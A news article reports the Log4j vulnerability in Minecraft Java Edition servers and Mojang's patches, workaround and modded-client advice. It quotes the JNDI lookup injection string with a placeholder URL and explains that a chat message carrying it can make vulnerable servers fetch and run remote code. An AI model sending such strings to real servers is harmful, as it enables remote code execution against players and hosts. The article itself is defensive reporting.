Original story (see the update below)
A critical security issue has been discovered that affects multiplayer servers in versions of Minecraft Java Edition as far back as 1.7.
Developer Mojang has not officially provided any specifics about the exploit, but advises users not to play any versions before 1.17 or any modded versions for the time being.
Mojang says that restarting the game's launcher should download a fix for the vulnerability, fixing versions 1.12 through 1.18. Versions prior to 1.12 may still be vulnerable.
The exploit lies in the logging utility program Log4j, before version 2.15. Minecraft makes use of this program for servers, but the program is also used by many other services.
How the vulnerability works is that Log4j allows connections to be made to arbitrary URLs using the logging text ${jndi:ldap://<url>}
, which may then download malicious code to a user's computer.
A malicious user may craft a chat messages that creates such a connection.
Any server running with a vulnerable version of Log4j (i.e. many unpatched Minecraft versions) is susceptible to having an attacker remotely run the downloaded code on a user's computer, which may allow the attacker to gain access to the device.
Mojang today released a release candidate for version 1.18.1, which they state fixes this security issue.
As a temporary workaround before the release of 1.18.1, Mojang advises disabling the lookup feature of Log4j using a JAR argument when starting the game.
Mojang has published an article about the exploit, confirming the Log4j library as the cause and giving advice for users across different versions and mods.
Mojang has now released a patch for all earlier affected versions of Minecraft. The game's launcher must be restarted to get this patch.
Minecraft Realms has also been patched and is now safe to play on.
The all-clear has now been given for Minecraft players to play on unmodded multiplayer servers.
Mojang warns that modded clients may still be at risk from this exploit, but notes that popular third-party clients Forge, Fabric and Paper have been updated to patch the vulnerability.
Mojang will give updates on their social media channels if any further information becomes available.